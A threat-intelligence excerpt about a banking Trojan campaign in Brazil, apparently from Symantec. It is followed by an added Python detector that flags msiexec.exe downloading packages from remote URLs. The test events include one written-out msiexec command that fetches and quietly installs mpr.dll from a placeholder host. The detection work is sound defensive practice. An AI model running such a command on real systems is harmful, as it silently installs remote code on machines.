Up to 100 organizations in Brazil have been targeted with a banking Trojan since approximately late August 2021, with the most recent activity seen in early October.
This campaign appears to be a continuation of activity first reported by researchers at ESET in 2020. The attackers appear to be undeterred by that exposure, and Symantec, a division of Broadcom Software, has found a large number of new indicators of compromise (IOCs) relating to this latest wave of attacks.
Symantec’s Threat Hunter Team first became aware of this recent campaign when suspicious activity was spotted in a customer environment on September 30, 2021. The initial activity was detected by our Cloud Analytics technology, and further investigation found that attempts were being made to download a suspicious file named mpr.dll into the customer’s environment. Msiexec.exe was attempting to download the file from a suspicious URL.
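The msiexec.exe download behaviour described above is the kind of thing a defender can hunt for in process-creation telemetry. The following is an added example, not code from Symantec or from the post: it scans constructed process-creation events (the URL and paths are placeholders, not the campaign's real IOCs) and flags msiexec.exe launches that reference a remote URL or the mpr.dll file name.

```python
import re

# Constructed process-creation events for illustration; the URL host
# "example.invalid" and file paths are placeholders, not real IOCs.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i http://example.invalid/pkg/mpr.dll /q"},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Temp\setup.msi /qn"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe readme.txt"},
]

# msiexec accepts an http(s) URL as the package argument, which lets it act
# as a downloader; a URL on its command line is the primary signal here.
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def is_msiexec(image: str) -> bool:
    """True when the launched binary is msiexec.exe (case-insensitive)."""
    return image.lower().endswith("\\msiexec.exe")


def classify(event: dict) -> list:
    """Return the detection reasons that apply to one process event."""
    reasons = []
    if not is_msiexec(event["image"]):
        return reasons
    cmdline = event["cmdline"]
    if URL_RE.search(cmdline):
        reasons.append("msiexec_remote_url")
    if "mpr.dll" in cmdline.lower():
        reasons.append("mpr_dll_reference")
    return reasons


def find_suspicious(events: list) -> list:
    """Return (cmdline, reasons) for every event that triggers a rule."""
    hits = []
    for event in events:
        reasons = classify(event)
        if reasons:
            hits.append((event["cmdline"], reasons))
    return hits


if __name__ == "__main__":
    for cmdline, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"{reasons}: {cmdline}")
```

Legitimate software deployment can also install MSI packages from an internal URL, so in practice the URL rule is tuned with an allowlist of known package hosts before it is used for alerting.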